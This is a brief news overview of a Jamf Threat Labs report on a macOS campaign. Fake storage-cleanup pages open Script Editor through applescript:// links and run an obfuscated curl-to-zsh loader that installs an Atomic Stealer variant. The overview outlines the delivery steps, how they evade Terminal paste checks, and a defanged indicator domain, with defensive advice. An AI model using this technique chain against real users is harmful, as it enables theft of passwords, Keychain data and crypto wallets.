Overview
- Jamf Threat Labs, which detailed the scheme Wednesday, says fake Apple‑themed storage‑cleanup pages use applescript:// links to open Script Editor from the browser.
- Script Editor, a built‑in macOS tool for running AppleScript and other scripts, appears with a prefilled script and tells the user to click Run.
- The script executes an obfuscated curl piped to zsh command that decodes a hidden URL and runs the fetched code in memory.
- A second stage places a Mach‑O file in /tmp, removes security flags, makes it executable, and launches an Atomic Stealer variant that hunts passwords, cookies, Keychain data, and crypto wallets.
- The move avoids Apple’s new Terminal paste checks, and Jamf shared indicators such as the dryvecar[.]com domain so defenders can block the sites and treat any browser request to open scripting tools as high risk.